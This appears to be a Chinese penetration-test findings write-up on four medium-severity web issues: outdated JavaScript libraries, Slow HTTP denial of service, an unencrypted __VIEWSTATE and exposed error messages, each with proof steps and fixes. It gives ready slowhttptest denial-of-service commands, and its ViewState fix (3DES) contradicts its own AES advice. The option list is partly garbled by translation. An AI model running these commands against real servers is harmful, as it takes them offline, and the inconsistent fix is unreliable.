文章目錄
- 1.【中危】不安全的Javascript庫(Vulnerable Javascript library)
-
- 漏洞描述
-
- SWFObject庫
- YUI庫
- 漏洞危害
- 漏洞證明
- 修複建議
- 2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)
-
- 漏洞描述
- 漏洞危害
- 漏洞證明
-
- 安裝工具
- 工具指令
- 四種方式
-
- slow header
- slow read
- slow post
- slowloris
- 修複建議
- 3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)
-
- 漏洞描述
- 漏洞危害
- 漏洞證明
-
- bp抓包
- viewstatedecoder2工具解密
- 修複建議
- 4.【中危】應用程式錯誤(Application error message)
-
- 漏洞描述
- 漏洞危害
- 漏洞證明
- 修複建議
1.【中危】不安全的Javascript庫(Vulnerable Javascript library)
漏洞描述
SWFObject庫
SWFObject是一個免費的開放源代碼工具,用于在網站中嵌入swf内容,SWFObject在Internet Explorer中進行動态嵌入的方法,以使用更友好的W3C方式建立。網站正在使用易受攻擊的Javascript庫,此版本的Javascript庫報告了一個或多個漏洞
YUI庫
Yahoo! UI Library (YUI) 是一個開放源代碼的 JavaScript 函數庫,為了能建立一個高互動的網頁,它采用了AJAX, DHTML 和 DOM 等程式碼技術。它也包含了許多 CSS 資源。網站正在使用不安全的YUI庫,此版本的YUI庫被報告了一個或多個漏洞
漏洞危害
SWF檔案中存在安全漏洞
漏洞證明
用bp抓包通路url,尋找響應包内Javascript庫版本

修複建議
更新到最新版本
2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)
漏洞描述
對任何一個開放了http通路的伺服器,建立一個連接配接,指定一個比較大的content-length,然後以非常低的速度發包HTTP,在連接配接不斷開的情況下,協定要求伺服器在處理請求之前将其完全接收。如果HTTP請求未完成,或者傳輸速率很低,則伺服器将使其資源繁忙,以等待其餘資料。如果伺服器使過多的資源繁忙,則會導緻拒絕服務
漏洞危害
攻擊者可通過一台機器關閉另一台機器的Web伺服器,并且帶寬最小,并且對不相關的服務和端口産生副作用
漏洞證明
利用工具slowhttptest
安裝工具
apt-get install slowhttptest
工具指令
- a —開始開始值範圍說明符用于範圍頭測試
- b 将位元組限制的範圍說明符用于範圍頭測試
– c 的連接配接數限制為65539
– d proxy host:port 用于指導所有流量通過web代理
– e proxy host:port 端口用于指導隻有探針交通通過web代理
– h,B,R或x 指定減緩在頭部分或在消息體,- R 允許範圍檢驗,使慢讀測試- x
– g 生成統計資料在CSV和HTML格式,模式是緩慢的xxx。csv / html,其中xxx是時間和日期
– i seconds 秒間隔跟蹤資料在幾秒鐘内,每個連接配接
– k 管道因子次數重複請求在同一連接配接慢讀測試如果伺服器支援HTTP管道内襯。
– l 在幾秒鐘内,秒測試時間
– n 秒間隔從接收緩沖區讀取操作
– o 檔案定義輸出檔案路徑和/或名稱,如果指定有效- g
– p 秒逾時等待HTTP響應在探頭連接配接後,伺服器被認為是不可通路的
– r seconds 連接配接速度
– s 位元組值的内容長度标題詳細說明,如果指定- b
– t verb 自定義
– u URL 目标URL,相同的格式鍵入浏覽器,e。g https://host[:port]/
– v level 冗長等級0 – 4的日志
– w 位元組範圍廣告的視窗大小會選擇從
– x 位元組最大長度的跟蹤資料結束
– y 位元組範圍廣告的視窗大小會選擇從
– z 位元組從接收緩沖區讀取位元組與單一的read()操作
四種方式
slow header
slowhttptest -c 65500 -H -i 10 -r 200 -s 8192 -t SLOWHEADER -u http://xxxx:8889
slow read
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://xxxx -p 5 -l 350 -e x.x.x.x:8080
slowhttptest -c 65500 -X -r 1000 -w 10 -y 20 -t SLOWREAD -n 5 -z 32 -u http://xxxx:8889
slow post
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://xxxx -x 10 -p 3
slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u http://xxxx:8889
slowloris
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://xxxx -x 24 -p 3
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://xxxx -x 24 -p 3
修複建議
1.可配置從一個用戶端接收HTTP頭部和HTTPbody的逾時時間和最小速率
2.配置各種不同粒度的HTTP請求門檻值
3.将web伺服器更新到最新版
3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)
漏洞描述
’__VIEWSTATE參數未加密。為了減少某人攔截存儲在ViewState中的資訊的機會,最好對ViewState進行加密。為此,請将machineKey驗證類型設定為AES。這訓示ASP.NET使用“進階加密标準”對ViewState值進行加密
漏洞危害
可能的敏感資訊洩露
漏洞證明
bp抓包
可在響應包頁面的viewstate中發現,自動解密
viewstatedecoder2工具解密
修複建議
在 Web.Config 檔案的元素之下,添加下面這一行:
<system.web> <machinekey validation="3DES"></machinekey></system.web>
4.【中危】應用程式錯誤(Application error message)
漏洞描述
應用程式錯誤或警告消息可能會将有關應用程式内部工作的敏感資訊暴露給攻擊者,可能洩露敏感資訊。該消息還可能包含産生未處理異常的檔案的位置
漏洞危害
錯誤消息可能會洩露可用于更新攻擊的敏感資訊
漏洞證明
通路構造好的檔案路徑,bp抓包
修複建議
驗證此頁面上是否顯示錯誤或警告消息,并正确配置應用程式以将錯誤記錄到檔案中,而不是向使用者顯示錯誤